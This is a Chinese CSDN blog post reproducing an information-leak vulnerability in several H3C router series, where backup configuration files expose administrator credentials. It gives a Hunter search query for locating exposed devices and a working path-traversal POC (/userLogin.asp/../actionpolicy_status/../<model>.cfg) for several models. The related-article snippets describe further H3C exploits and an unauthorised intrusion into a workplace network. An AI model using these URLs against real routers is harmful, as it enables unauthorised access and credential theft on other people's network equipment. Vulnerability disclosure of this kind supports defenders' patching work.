【漏洞复现】H3C 路由器多系列信息泄露漏洞

已于 2024-02-19 08:31:47 修改
阅读量3k 收藏 15
点赞数 12
文章标签: 安全 服务器 web安全 网络
于 2024-02-19 08:31:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136162041
版权
【漏洞复现】 专栏收录该内容
150 篇文章

已下架不支持订阅

本文详细介绍了H3C路由器存在的信息泄露漏洞,攻击者能通过此漏洞获取管理员账户和密码。文章涵盖了漏洞描述、复现过程以及修复建议,提醒用户及时联系厂商处理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Nx01 产品简介

        H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。

Nx02 漏洞描述

        H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。

Nx03 产品主页

hunter-query:app.name="H3C Router Management"

Nx04 漏洞复现

POC:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现H3C路由器信息泄露任意用户登录
失心少年
09-06 3653
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!1.利用GET发送如下请求包,获取管理员账号密码(ER3100 根据web界面的标题修改)通过访问特地址得到密码可进行登录。
H3C iMC智能管理中心 远程代码执行漏洞复现(XVE-2024-4567)
0xSec
08-07 2337
H3C iMC智能管理中心 /byod/index.xhtml、/selfservice/login.jsf、/rpt/reportpage/loginrpt.jsf等个接口处存在远程代码执行漏洞,未经身份攻击者可通过该漏洞服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。
漏洞复现-H3C系列
aming小老弟
03-15 1404
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 5106
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
(附nuclei yaml文件)H3C款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
nglj9527的博客
05-22 1341
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
H3C ER G2系列路由器敏感信息泄露漏洞
故事讲予风听
09-20 2453
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
远程重启h3c路由器_Oracle WebLogic远程代码执行漏洞(CVE20202546、CVE20202551)威胁通告...
weixin_39535217的博客
12-12 728
漏洞综述关于WebLogic ServerWebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。安全公告2020年1月15日,Oracle官方发布了2020年1月关键补丁更新,包含了家族个产品的安全漏洞公告。其中有两个跟Oracle ...
h3c系列路由器存在任意用户登录漏洞
m0_49025459的博客
08-28 4552
也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后,账户一般都是admin。根据根据系统名修改payload。发送请求包,获取管理员账号密码。
漏洞复现】Tenda路由器存在密码泄露
失心少年
09-09 1202
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。腾达W15E路由器外置4根增强型360°全向天线,苛刻调校到0.01毫米级的零干扰间距,科学独立布局的信号放大器PA,穿墙性能更强劲,覆盖范围更广,在哪都有好信号。1.执行密码泄露的POC,泄露密码在当前文件的sys.userpass=位置,然后base64解码即可使用该明文密码登录路由器后台。
漏洞复现】中国移动 禹路由-信息泄露-ExportSettings.sh
知黑而守白
07-10 202
中移禹路由器是一款性能强大且功能丰富的无线路由器。它采用了最新的Wi-Fi 6技术,提供更快的速度和更稳定的连接。它支持双频段同时工作,2.4GHz和5GHz频段可同时提供高速的无线网络,满足设备同时连接的需求。中移禹路由器还具备MU-MIMO技术,可以同时处理个设备的数据传输,提供更快的速度和更稳定的连接。中移铁通禹路由器ExportSettings接口处存在信息泄露漏洞,恶意攻击者可能会利用此漏洞获取到登陆账户和密码,从而登录后台,使服务器处于不安全的状态。
H3C路由器忘记密码处理方法
08-30
忘记密码的出来方法,很容易学会。H3C路由器忘记密码处理方法
H3C ER8300G2-X未授权导致信息泄露漏洞(CVE-2024-32238)
缘梦未来的博客
11-13 1019
H3C ER8300G2-X是杭州华三通信技术有限公司(以下简称H3C公司)推出的新一代企业级千兆高性能路由器,它定位于以太网/光纤/xDSL接入的SMB市场,主要包括需要高速Internet接入的政府机构、中小企业、酒店、学校、医院、网吧等网络环境。
H3C路由器userLogin.asp信息泄漏漏洞-类型补充
weixin_45100060的博客
08-06 731
华三家用路由器配置泄露
漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 1147
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
漏洞复现H3C-用户自助服务平台-mselfservice-远程命令执行
知黑而守白
03-12 353
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台 mselfservice 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
H3C ER8300G2-X.cfg信息泄露漏洞
最新发布
ZeroDay001的博客
11-14 392
H3C(新华三)是一家专注于数字化解决方案的科技公司,提供全方位的计算、存储、网络安全等产品和服务,广泛应用于企业、政府、教育、医疗等行业。它致力于为客户提供数字化转型所需的综合解决方案,以提升业务效率并加速创新。
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3708
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
H3C系列路由器存在前台RCE漏洞(含批量验证poc)
weixin_43567873的博客
04-05 1843
H3C系列路由器存在前台RCE漏洞(含批量验证poc)
利用H3C ER5100权限绕过漏洞***内网
weixin_34082695的博客
04-05 2880
昨天在老婆单位门口等老婆下班回家。在车里没事,决定给老婆单位做一个免费的***测试服务。因为老婆在某豪华车4S店工作,她们单位的WiFi信号隔着一条马路还是满格。虽然用的是WPA/WPA2加密。使用Aircrack-ng直接截获密码文件,上传到我用树莓派搭建的“24小时开机大数据社工库暨超牛逼彩虹表破解平台”用了不到十分钟就跑了出来,8位纯数字,我只能说呵呵。跟老婆打电话,...
H3C路由器系列维护指南精选汇总
资源摘要信息:"H3C系列路由器产品维护指导书汇总集"是一个集合了H3C公司旗下款万兆核心路由器以及其它系列路由器维护和故障处理指导的综合性文档。这份文档详细阐述了各款路由器的基本维护、特性变更、常见问题...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值